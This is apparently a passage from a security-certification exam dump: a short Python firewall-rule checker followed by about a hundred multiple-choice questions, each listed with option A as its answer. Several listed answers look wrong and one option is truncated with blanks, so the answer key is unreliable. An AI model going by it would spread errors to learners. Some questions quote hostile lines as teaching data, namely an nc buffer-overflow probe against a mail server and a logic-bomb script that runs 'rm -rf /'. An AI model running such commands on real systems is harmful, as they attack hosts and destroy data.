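ORIGINAL = [Rule(10, "PERMIT", 80), Rule(20, "PERMIT", 443), Rule(30, "DENY", None)]

# The four answer options, expressed as rulesets.
OPTION_A = [Rule(5, "PERMIT", 53)] + ORIGINAL                  # allow DNS ahead of the deny
OPTION_B = [Rule(10, "PERMIT", 22), Rule(20, "PERMIT", 443), Rule(30, "DENY", None)]
OPTION_C = ORIGINAL + [Rule(25, "PERMIT", None)]               # permit-any before the deny
OPTION_D = [r for r in ORIGINAL if r.seq != 30]                # drop the explicit deny-all


def web_browsing_works(rules: List[Rule], default: str = "DENY") -> bool:
    """Browsing needs name resolution (53) plus HTTP (80) and HTTPS (443)."""
    return all(evaluate(rules, p, default) == "PERMIT" for p in (53, 80, 443))


def permitted_ports(rules: List[Rule], probe: List[int],
                    default: str = "DENY") -> List[int]:
    """Which of the probe ports the ruleset lets through."""
    return [p for p in probe if evaluate(rules, p, default) == "PERMIT"]


if __name__ == "__main__":
    PROBE = [22, 53, 80, 443, 3389]
    for name, rules in [("original", ORIGINAL), ("A", OPTION_A), ("B", OPTION_B),
                        ("C", OPTION_C), ("D", OPTION_D)]:
        print(name, web_browsing_works(rules), permitted_ports(rules, PROBE))
    # Option D only "works" on a device whose default action is permit,
    # and then it permits everything, which is why it is the least secure.
    print("D (default permit)", permitted_ports(OPTION_D, PROBE, default="PERMIT"))
```

Option A is the only change that restores browsing while still denying every other port; option C restores browsing by permitting everything, and option D relies on the device having no implicit deny, which again opens every port.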
A security administrator is concerned about the increasing number of users who click on malicious links contained within phishing emails. Although the company has implemented a process to block these links at the network perimeter, many accounts are still becoming compromised. Which of the following should be implemented to further reduce the number of account compromises caused by remote users who click these links? A. Anti-spam gateways B. Security awareness training C. URL rewriting D. Internal phishing campaign
A. Anti-spam gateways
Which of the following is an example of a false positive? A. Anti-virus identifies a benign application as malware. B. A biometric iris scanner rejects an authorized user wearing a new contact lens. C. A user account is locked out after the user mistypes the password too many times. D. The IDS does not identify a buffer overflow.
A. Anti-virus identifies a benign application as malware.
A security analyst has been dealing with a large number of malware infections on workstations with legacy operating systems. The infections are not being detected by the current AV suite. Further analysis shows that the signatures are up-to-date and the AV engines are functioning correctly. The company is unable to afford next-generation AV that prevents these types of attacks. Which of the following methods should the security analyst employ to prevent future outbreaks? A. Application whitelisting B. Patch management C. Host-based intrusion detection D. File integrity monitoring
A. Application whitelisting
A security analyst observes the following events in the logs of an employee workstation: 1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level. 1/23 1:07:09 1034 The scan is completed. No detections were found. The security analyst reviews the file system and observes the following: C:\>dir C:\Users\user\temp 1/23 1:07:02 oasdfkh.hta 1/23 1:07:02 update.bat 1/23 1:07:02 msg.txt Given the information provided, which of the following MOST likely occurred on the workstation? A. Application whitelisting controls blocked an exploit payload from executing. B. Antivirus software found and quarantined three malware files. C. Automatic updates were initiated but failed because they had not been approved. D. The SIEM log agent was not tuned properly and reported a false positive.
A. Application whitelisting controls blocked an exploit payload from executing.
A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network: Hostname IP Address MAC MAC Filter DadPC 192.168.1.15 00:1D:1A:44:17:B5 On MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off JuniorPC 192.168.2.16 42:A7:D1:25:11:52 On Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? A. Apply MAC filtering and see if the router drops any of the systems B. Physically check each of the authorized systems to determine if they are logged onto the network C. Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host D. Conduct a ping sweep of each of the authorized systems and see if an echo response is received
A. Apply MAC filtering and see if the router drops any of the systems
Which of the following describes a type of malware which is difficult to reverse engineer in a virtual lab? A. Armored virus B. Polymorphic malware C. Logic bomb D. Rootkit
A. Armored virus
A company that purchased an HVAC system for the datacenter is MOST concerned with which of the following? A. Availability B. Integrity C. Confidentiality D. Fire suppression
A. Availability
Which of the following are used to substantially increase the computation time required to crack a password? (Select TWO). A. BCRYPT B. Substitution cipher C. ECDHE D. PBKDF2 E. Diffie-Hellman
A. BCRYPT D. PBKDF2
A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? A. Banner grabbing B. Port scanning C. Packet sniffing D. Virus scanning
A. Banner grabbing
A network technician is on the phone with the system administration team. Power to the server room was lost and servers need to be restarted. The DNS services must be the first to be restarted. Several machines are powered off. Assuming each server only provides one service, which of the following should be powered on FIRST to establish DNS services? A. Bind server B. Apache server C. Exchange server D. RADIUS server
A. Bind server
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus
A. Botnet
Sara, an application developer, implemented error and exception handling alongside input validation. Which of the following does this help prevent? A. Buffer overflow B. Pop-up blockers C. Cross-site scripting D. Fuzzing
A. Buffer overflow
Which of the following types of attack is the result of software vulnerabilities and is caused by supplying more data than is expected in an input field? A. Buffer overflow attack B. Cross site scripting C. Denial-of-Service (DoS) attack D. App overloading
A. Buffer overflow attack
During a routine vulnerability assessment, the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' ' " | nc www.company.com 25 Which of the following vulnerabilities is being exploited? A. Buffer overflow directed at a specific host MTA B. SQL injection directed at a web server C. Cross-site scripting directed at www.company.com D. Race condition in a UNIX shell script
A. Buffer overflow directed at a specific host MTA
A network administrator wants to block both DNS requests and zone transfers coming from outside IP addresses. The company uses a firewall which implements an implicit allow and is currently configured with the following ACL applied to its external interface: PERMIT TCP ANY ANY 80 PERMIT TCP ANY ANY 443 Which of the following rules would accomplish this task? (Select TWO). A. Change the firewall default settings so that it implements an implicit deny B. Apply the current ACL to all interfaces of the firewall C. Remove the current ACL D. Add the following ACL at the top of the current ACL DENY TCP ANY ANY 53 E. Add the following ACL at the bottom of the current ACL DENY ICMP ANY ANY 53 F. Add the following ACL at the bottom of the current ACL DENY IP ANY ANY 53
A. Change the firewall default settings so that it implements an implicit deny F. Add the following ACL at the bottom of the current ACL DENY IP ANY ANY 53
A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Select TWO) A. Compare configurations against platform benchmarks. B. Confirm adherence to the company's industry-specific regulations C. Review the company's current security baseline. D. Verify alignment with policy related to regulatory compliance. E. Run an exploitation framework to confirm vulnerabilities.
A. Compare configurations against platform benchmarks. C. Review the company's current security baseline.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Competitor B. Hacktivist C. Insider D. Organized crime
A. Competitor
Which of the following encompasses application patch management? A. Configuration management B. Policy management C. Cross-site request forgery D. Fuzzing
A. Configuration management
A security administrator is creating a risk assessment with regard to how to harden internal communications in transit between servers. Which of the following should the administrator recommend in the report? A. Configure IPSec in transport mode. B. Configure server-based PKI certificates. C. Configure the GRE tunnel. D. Configure a site-to-site tunnel.
A. Configure IPSec in transport mode.
An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software? A. Configure a firewall with deep packet inspection that restricts traffic to the systems. B. Configure a separate zone for the systems and restrict access to known ports. C. Configure the systems to ensure only necessary applications are able to run. D. Configure the host firewall to ensure only the necessary applications have listening ports.
A. Configure a firewall with deep packet inspection that restricts traffic to the systems.
A technician has installed a new AAA server, which will be used by the network team to control access to a company's routers and switches. The technician completes the configuration by adding the network team members to the NETWORK_TEAM group, and then adding the NETWORK_TEAM group to the appropriate ALLOW_ACCESS access list. Only members of the network team should have access to the company's routers and switches. NETWORK_TEAM Lee Andrea Pete ALLOW_ACCESS DOMAIN_USERS AUTHENTICATED_USERS NETWORK_TEAM Members of the network team successfully test their ability to log on to various network devices configured to use the AAA server. Weeks later, an auditor asks to review the following access log sample: 5/26/2017 10:20 PERMIT: LEE 5/27/2017 13:45 PERMIT: ANDREA 5/27/2017 09:12 PERMIT: LEE 5/28/2017 16:37 PERMIT: JOHN 5/29/2017 08:53 PERMIT: LEE A. Configure the ALLOW_ACCESS group logic to use AND rather than OR. B. Move the NETWORK_TEAM group to the top of the ALLOW_ACCESS access list. C. Disable group nesting for ALLOW_ACCESS group in the AAA server. D. Remove the DOMAIN_USERS group from the ALLOW_ACCESS group.
A. Configure the ALLOW_ACCESS group logic to use AND rather than OR.
A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this? A. Configure the OS default TTL to 1 B. Use NAT on the R&D network C. Implement a router ACL D. Enable protected ports on the switch
A. Configure the OS default TTL to 1
While investigating a virus infection, a security analyst discovered the following on an employee laptop: Multiple folders containing a large number of newly released movies and music files Proprietary company data A large amount of PHI data Unapproved FTP software Documents that appear to belong to a competitor Which of the following should the analyst do FIRST? A. Contact the legal and compliance department for guidance. B. Delete the files, remove the FTTP software, and __________ C. Back up the files and return the device to ___________ D. Wipe and reimage the device.
A. Contact the legal and compliance department for guidance.
A recent audit contained significant findings for several servers, including: Missing OS and vendor patches, expired SSL certificate, and out of date antivirus. In the future, which of the following capabilities would enable administrators to detect these issues proactively? A. Credentialed vulnerability scan B. Non-credentialed vulnerability scan C. Automatic file integrity checking D. Manual file integrity checking E. Log collection and correlation
A. Credentialed vulnerability scan
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select THREE). A. Crypto-malware B. Adware C. Botnet attack D. Virus E. Ransomware F. Backdoor G. DDoS attack
A. Crypto-malware C. Botnet attack E. Ransomware
A security analyst reviews the following log entry: 2017-01-13 1622CST 10.11.24.18 93242 148 TCP_HIT 200.200.0.223 _ OBSERVED POST HTTP/1.1.0. "Mozilla 1." www.dropbox.com Financial_Report_2016_CONFID.pdf, 13MB, MS-RTC LM8; .NET CLR 3.0.4509.1392, Jane.Doe Which of the following security issues can the analyst identify? A. Data exfiltration B. Access violation C. Social engineering D. Unencrypted credentials
A. Data exfiltration
A merchant acquirer has the need to store credit card numbers in a transactional database in a high performance environment. Which of the following BEST protects the credit card data? A. Database field encryption B. File-level encryption C. Data loss prevention system D. Full disk encryption
A. Database field encryption
A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future? A. Deploy multiple web servers and implement a load balancer. B. Increase the capacity of the perimeter router to 10Gbps. C. Implement a forwarding proxy and URL filtering for the organization's applications. D. Implement an active/passive high availability solution.
A. Deploy multiple web servers and implement a load balancer.
Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Technical D. Deterrent
A. Detective
A security analyst is reviewing the password policy for a service account that is used for a critical network service. The password policy for this account is as follows: Enforce password history: 3 passwords remembered Maximum password age: 30 days Minimum password age: 0 days Complexity requirements: At least 1 special character, 1 uppercase Minimum password length: 7 characters Lockout duration: 1 day Lockout threshold: 5 failed attempts in 15 minutes Which of the following adjustments would be MOST appropriate for the service account? A. Disable account lockouts. B. Set the maximum password age to 15 days C. Set the minimum password age to seven days D. Increase password length to 18 characters
A. Disable account lockouts.
An auditor's report discovered several accounts with no activity for over 60 days. The accounts were later identified as contractors' accounts; the contractors would be returning in three months and would need to resume their activities. Which of the following would mitigate and secure the auditor's finding? A. Disable unnecessary contractor accounts and inform the auditor of the update. B. Reset contractor accounts and inform the auditor of the update. C. Inform the auditor that the accounts belong to the contractors. D. Delete contractor accounts and inform the auditor of the update.
A. Disable unnecessary contractor accounts and inform the auditor of the update.
Several bins are located throughout a building for secure disposal of sensitive information. Which of the following does this prevent? A. Dumpster diving B. War driving C. Tailgating D. War chalking
A. Dumpster diving
A security administrator is developing controls for creating audit trails and for tracking in case a PHI data breach occurs. The administrator has been given the following requirements: *All access must be correlated to a user account. *All user accounts must be assigned to a single individual. *User access to the PHI data must be recorded. *Anomalies in PHI data access must be reported. *Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews.
A. Eliminate shared accounts. C. Implement usage auditing and review. E. Copy logs in real time to a secured WORM drive.
Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured? A. Embedded web server B. Spooler C. Network interface D. LCD control panel
A. Embedded web server
A security analyst is emailing PII in a spreadsheet file to an audit validator for after-actions related to a security assessment. The analyst must make sure the PII data is protected with the following minimum requirements: Ensure confidentiality at rest. Ensure the integrity of the original email message. Which of the following controls would ensure these data security requirements are carried out? A. Encrypt and sign the email using S/MIME. B. Encrypt the email and send it using TLS. C. Hash the email using SHA-1. D. Sign the email using MD5.
A. Encrypt and sign the email using S/MIME.
A company has been experiencing many successful email phishing attacks, which have been resulting in the compromise of multiple employees' accounts when employees reply with their credentials. The security administrator has been notifying each user and resetting the account passwords when accounts become compromised. Regardless of this process, the same accounts continue to be compromised even when the users do not respond to the phishing attacks. Which of the following are MOST likely to prevent similar account compromises? (Select TWO). A. Enforce password reuse limitations. B. Enable password complexity. C. Reset the account security questions. D. Configure account lockout. E. Implement time-of-day restrictions.
A. Enforce password reuse limitations. C. Reset the account security questions.
Which of the following BEST implements control diversity to reduce the risks associated with the authentication of employees into company resources? A. Enforcing the use of something you know and something you have for authentication B. Requiring employees to sign the company's password and acceptable use policies C. Implementing LDAP authentication for some systems and RADIUS authentication for others D. Publishing a password policy and enforcing password requirements via a GPO
A. Enforcing the use of something you know and something you have for authentication
Which of the following is an application security coding problem? A. Error and exception handling B. Patch management C. Application hardening D. Application fuzzing
A. Error and exception handling
A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected with full disk encryption, and the permissions are set as follows: File system permissions: Users = Read Only Share permission: accounting-svc = Read Only Given the listed protections are in place and unchanged, to which of the following risks is the data still subject? A. Exploitation of local console access and removal of data B. Theft of physical hard drives and a breach of confidentiality C. Remote exfiltration of data using domain credentials D. Disclosure of sensitive data to third parties due to excessive share permissions
A. Exploitation of local console access and removal of data
Which of the following fire suppression systems is MOST likely used in a datacenter? A. FM-200 B. Dry-pipe C. Wet-pipe D. Vacuum
A. FM-200
Which of the following occurs when a vulnerability scan fails to identify an existing vulnerability? A. False negative B. False positive C. True positive D. True negative
A. False negative
This security tool is best for checking whether specific system files have been changed and reporting on those changes. A. File integrity checker B. HIDS / HIPS C. Application whitelisting D. DLP
A. File integrity checker
Which of the following implements a stream cipher? A. File-level encryption B. IKEv2 exchange C. SFTP data transfer D. S/MIME encryption
A. File-level encryption
Which of the following devices would MOST likely have a DMZ interface? A. Firewall B. Switch C. Load balancer D. Proxy
A. Firewall
Which of the following controls can be implemented together to prevent data loss in the event of theft of a mobile device storing sensitive information? (Select TWO). A. Full device encryption B. Screen locks C. GPS D. Asset tracking E. Inventory control
A. Full device encryption B. Screen locks
A way to assure data at-rest is secure even in the event of loss or theft is to use: A. Full device encryption. B. Special permissions on the file system. C. Trusted Platform Module integration. D. Access Control Lists.
A. Full device encryption.
Which of the following allows an auditor to test proprietary-software compiled code for security flaws? A. Fuzzing B. Static review C. Code signing D. Regression testing
A. Fuzzing
Which of the following application security testing techniques is implemented when an automated system generates random input data? A. Fuzzing B. XSRF C. Hardening D. Input validation
A. Fuzzing
A company wants to ensure users are only logging into the system from their laptops when they are on site. Which of the following would assist with this? A. Geofencing B. Smart cards C. Biometrics D. Tokens
A. Geofencing
Pete, a developer, writes an application. Jane, the security analyst, knows some things about the overall application but does not have all the details. Jane needs to review the software before it is released to production. Which of the following reviews should Jane conduct? A. Gray Box Testing B. Black Box Testing C. Business Impact Analysis D. White Box Testing
A. Gray Box Testing
A new intern was assigned to the system engineering department, which consists of the system architect and system software developer teams. These two teams have separate privileges. The intern requires privileges to view the system architectural drawings and comment on some software development projects. Which of the following methods should the system administrator implement? A. Group based privileges B. Generic account prohibition C. User access review D. Credential management
A. Group based privileges
Jane, a security administrator, has observed repeated attempts to break into a server. Which of the following is designed to stop an intrusion on a specific server? A. HIPS B. NIDS C. HIDS D. NIPS
A. HIPS
Which of the following devices is BEST suited for servers that need to store private keys? A. Hardware security module B. Hardened network firewall C. Solid state disk drive D. Hardened host firewall
A. Hardware security module
After a series of breaches, a network administrator identified that staff recorded complex passwords in writing. The network administrator is adding multifactor authentication to the system. Which of the following should the administrator implement? A. Hardware token B. User PIN C. Image patterns D. Security questions
A. Hardware token
Which of the following functions provides an output which cannot be reversed and converts data into a string of characters? A. Hashing B. Stream ciphers C. Steganography D. Block ciphers
A. Hashing
Which international standard is used for Network Access Control? A. IEEE 802.1X B. IEEE 802.11 C. ISO 27001 D. GDPR
A. IEEE 802.1X
Configuring the mode, encryption methods, and security associations are part of which of the following? A. IPSec B. Full disk encryption C. 802.1x D. PKI
A. IPSec
A network engineer is designing a secure tunneled VPN. Which of the following protocols would be the MOST secure? A. IPsec B. SFTP C. BGP D. PPTP
A. IPsec
A company has decided to move large data sets to a cloud provider in order to limit the costs of new infrastructure. Some of the data is sensitive and the Chief Information Officer wants to make sure both parties have a clear understanding of the controls needed to protect the data. Which of the following types of interoperability agreement is this? A. ISA B. MOU C. SLA D. BPA
A. ISA
A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company's revenue, referrals, and reputation. Which of the following is an element of the BIA that this action is addressing? A. Identification of critical systems B. Single point of failure C. Value assessment D. Risk register
A. Identification of critical systems
Which of the following is the proper order for logging a user into a system from the first step to the last step? A. Identification, authentication, authorization B. Identification, authorization, authentication C. Authentication, identification, authorization D. Authentication, identification, authorization E. Authorization, identification, authentication
A. Identification, authentication, authorization
A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? A. Identify the source of the active connection B. Perform eradication of active connection and recover C. Perform containment procedures by disconnecting the server D. Format the server and restore its initial configuration
A. Identify the source of the active connection
A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations? A. Implement SAML so the company's services may accept assertions from the customers' authentication servers. B. Provide customers with a constrained interface to manage only their users' accounts in the company's active directory server. C. Provide a system for customers to replicate their users' passwords from their authentication service to the company's. D. Use SOAP calls to support authentication between the company's product and the customers' authentication servers.
A. Implement SAML so the company's services may accept assertions from the customers' authentication servers.
Which of the following allows Pete, a security technician, to provide the MOST secure wireless implementation? A. Implement WPA B. Disable SSID C. Adjust antenna placement D. Implement WEP
A. Implement WPA
A security administrator is performing a risk assessment on a legacy WAP with a WEP-enabled wireless infrastructure. Which of the following should be implemented to harden the infrastructure without upgrading the WAP? A. Implement WPA and TKIP. B. Implement WPS and an eight-digit pin. C. Implement WEP and RC4. D. Implement WPA2 Enterprise.
A. Implement WPA and TKIP.
A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Remote wipe capabilities Geolocation services Patch management and reporting Mandatory screen locks Ability to require passcodes and pins Ability to require encryption Which of the following would BEST meet these requirements? A. Implementing MDM software B. Deploying relevant group policies to the devices C. Installing full device encryption D. Removing administrative rights to the devices
A. Implementing MDM software
In which type of vulnerability do accounts have greater privileges than needed to perform a function, a problem that is solved by least privilege? A. Improperly configured accounts B. Resource exhaustion C. Improper input handling D. Race condition
A. Improperly configured accounts
After a number of highly publicized and embarrassing customer data leaks as a result of social engineering attacks by phone, the Chief Information Officer (CIO) has decided user training will reduce the risk of another data leak. Which of the following would be MOST effective in reducing data leaks in this situation? A. Information Security Awareness B. Social Media and BYOD C. Data Handling and Disposal D. Acceptable Use of IT Systems
A. Information Security Awareness
An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this? A. Input validation B. Proxy server C. Stress testing D. Encoding
A. Input validation
Which of the following can BEST help prevent cross-site scripting attacks and buffer overflows on a production system? A. Input validation B. Network intrusion detection system C. Anomaly-based HIDS D. Peer review
A. Input validation
Corporations choose to exceed regulatory framework standards because of which of the following incentives? A. It improves the legal defensibility of the company B. It gives a social defense that the company is not violating customer privacy laws C. It proves to investors that the company takes APT cyber actors seriously D. It results in overall industrial security standards being raised voluntarily
A. It improves the legal defensibility of the company
With regard to secure coding practices, why is input validation important? A. It mitigates buffer overflow attacks. B. It makes the code more readable. C. It provides an application configuration baseline. D. It meets gray box testing standards.
A. It mitigates buffer overflow attacks.
Jane, a security administrator, has been tasked with explaining authentication services to the company's management team. The company runs an active directory infrastructure. Which of the following solutions BEST relates to the host authentication protocol within the company's environment? A. Kerberos B. Least privilege C. TACACS+ D. LDAP
A. Kerberos
Which of the following types of authentication packages user credentials in a ticket? A. Kerberos B. LDAP C. TACACS+ D. RADIUS
A. Kerberos
A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file? A. Keylogger B. Rootkit C. Bot D. RAT
A. Keylogger
A network technician is trying to set up a secure method for managing users and groups across the enterprise. Which of the following protocols is MOST likely to be used? A. LDAPS B. SFTP C. NTLM D. SNMPv3
A. LDAPS
A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor. Which of the following BEST describes this forensic concept? A. Legal hold B. Chain of custody C. Order of volatility D. Data acquisition
A. Legal hold
After a security incident, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process? A. Lessons learned B. Recovery C. Identification D. Preparation
A. Lessons learned
Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed? A. Lessons learned review B. Root cause analysis C. Incident audit D. Corrective action exercise
A. Lessons learned review
An information security specialist is reviewing the following output from a Linux server: user@server:~$ -l 5 * * * * /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd the rm -rf / fi Based on the above information, which of the following types of malware was installed on the server? A. Logic bomb B. Trojan C. Backdoor D. Ransomware E. Rootkit
A. Logic bomb
Which of the following presents the STRONGEST access control? A. MAC B. TACACS C. DAC D. RBAC
A. MAC
Which of the following means of wireless authentication is easily vulnerable to spoofing? A. MAC Filtering B. WPA - LEAP C. WPA - PEAP D. Enabled SSID
A. MAC Filtering
An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST? A. Make a copy of everything in memory on the workstation. B. Turn off the workstation. C. Consult the information security policy. D. Run a virus scan.
A. Make a copy of everything in memory on the workstation.
Which of the following would be MOST effective in reducing tailgating incidents? A. Mantrap B. Faraday cage C. Motion detection D. Bollards
A. Mantrap
A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed? A. Mission-essential function B. Single point of failure C. Backup and restoration plans D. Identification of critical systems
A. Mission-essential function
Which of the following types of encryption will help in protecting files on a PED? A. Mobile device encryption B. Transport layer encryption C. Encrypted hidden container D. Database encryption
A. Mobile device encryption
A company recently experienced data exfiltration via the corporate network. In response to the breach, a security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS? A. Network tap B. Network proxy C. Honeypot D. Port mirroring
A. Network tap
Which of the following strategies helps reduce risk if a rollback is needed when upgrading a critical system platform? A. Non-persistent configuration B. Continuous monitoring C. Firmware updates D. Fault tolerance
A. Non-persistent configuration
A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key? (Select TWO) A. Non-repudiation B. Email content encryption C. Steganography D. Transport security E. Message integrity
A. Non-repudiation E. Message integrity
After a recent internal breach, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates? A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data. B. One key pair will be used for encryption. The other key pair will provide extended validation. C. Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength. D. One key pair will be used for internal communication, and the other will be used for external communication.
A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.
An organization wants to utilize a common, Internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide required services. To which of the following technologies is the provider referring? A. OpenID Connect B. SAML C. XACML D. LDAP
A. OpenID Connect
Sara, the security administrator, must configure the corporate firewall to allow all public IP addresses on the internal interface of the firewall to be translated to one public IP address on the external interface of the same firewall. Which of the following should Sara configure? A. PAT B. NAP C. DNAT D. NAC
A. PAT
A security engineer is asked by the company's development team to recommend the most secure method for password storage. Which of the following provide the BEST protection against brute forcing stored passwords? (Select TWO). A. PBKDF2 B. MD5 C. SHA2 D. Bcrypt E. AES F. CHAP
A. PBKDF2 D. Bcrypt
Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system? A. Passive scan B. Aggressive scan C. Credentialed scan D. Intrusive scan
A. Passive scan
An auditing team has found that passwords do not meet best business practices. Which of the following will MOST increase the security of the passwords? (Select TWO). A. Password Complexity B. Password Expiration C. Password Age D. Password Length E. Password History
A. Password Complexity D. Password Length
A recent audit has discovered that at the time of password expiration clients are able to recycle the previous credentials for authentication. Which of the following controls should be used together to prevent this from occurring? (Select TWO). A. Password age B. Password hashing C. Password complexity D. Password history E. Password length
A. Password age D. Password history
A hacker has a packet capture that contains: ....Joe Smith........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture? A. Password cracker B. Vulnerability scanner C. DLP scanner D. Fuzzer
A. Password cracker
A security administrator wants to audit the login page of a newly developed web application to determine if default accounts have been disabled. Which of the following is BEST suited to perform this audit? A. Password cracker B. Rainbow table C. Protocol analyzer D. Banner grabbing
A. Password cracker
A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists in a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information? A. Penetration test B. Vulnerability scan C. Active reconnaissance D. Patching assessment report
A. Penetration test
Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the Windows/ CurrentVersion/ Run registry key? A. Persistence B. Pivoting C. Active reconnaissance D. Escalation of privilege
A. Persistence
Jane, an administrator, needs to make sure the wireless network is not accessible from the parking area of their office. Which of the following would BEST help Jane when deploying a new access point? A. Placement of antenna B. Disabling the SSID C. Implementing WPA2 D. Enabling the MAC filtering
A. Placement of antenna
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero-day attack
A. Policy violation
After a security assessment was performed on the enterprise network, it was discovered that: 1. Configuration changes have been made by users without the consent of IT. 2. Network congestion has increased due to the use of social media. 3. Users are accessing file folders and network shares that are beyond the scope of their need to know. Which of the following BEST describe the vulnerabilities that exist in this environment? (Select TWO) A. Poorly trained users B. Misconfigured WAP settings C. Undocumented assets D. Improperly configured accounts E. Vulnerable business processes
A. Poorly trained users D. Improperly configured accounts
After discovering the /etc/shadow file had been changed, a security administrator noticed an application insecurely creating files in /tmp. Which of the following vulnerabilities has MOST likely been exploited? A. Privilege escalation B. Resource exhaustion C. Memory leak D. Pointer dereference
A. Privilege escalation
An organization employee resigns without giving adequate notice. The following day, it is determined that the employee is still in possession of several company-owned mobile devices. Which of the following could have reduced the risk of this occurring? (Select TWO). A. Proper offboarding procedures B. Acceptable use policies C. Non-disclosure agreements D. Exit interviews E. Background checks F. Separation of duties
A. Proper offboarding procedures D. Exit interviews
Which of the following is BEST used to capture and analyze network traffic between hosts on the same network segment? A. Protocol analyzer B. Router C. Firewall D. HIPS
A. Protocol analyzer
Which of the following would a security administrator implement in order to identify a problem between two systems that are not communicating properly? A. Protocol analyzer B. Baseline report C. Risk assessment D. Vulnerability scan
A. Protocol analyzer
An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication? A. Proximity card, fingerprint scanner, PIN B. Fingerprint scanner, voice recognition, proximity card C. Smart card, user PKI certificate, privileged user certificate D. Voice recognition, smart card, proximity card
A. Proximity card, fingerprint scanner, PIN
Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES
A. Public key E. Private key
An organization would like to grant access to its wireless network to users who are visiting from another trusted organization by authenticating the visiting users at their home organization. Which of the following is the organization's BEST option? A. RADIUS Federation B. Captive portal C. OCSP D. Certificate chaining
A. RADIUS Federation
University A offers an AAA-based SSO service that allows students to access all wireless and VPN services with the standard university credentials. University A wants to partner with University B to allow its students who are taking classes at University B to sign into either university's wireless network and VPN services with their home university credentials. Which of the following should be implemented to achieve the desired results? A. RADIUS federation B. SAML C. Wildcard certificates D. OAuth 2.0 E. Reverse proxy
A. RADIUS federation
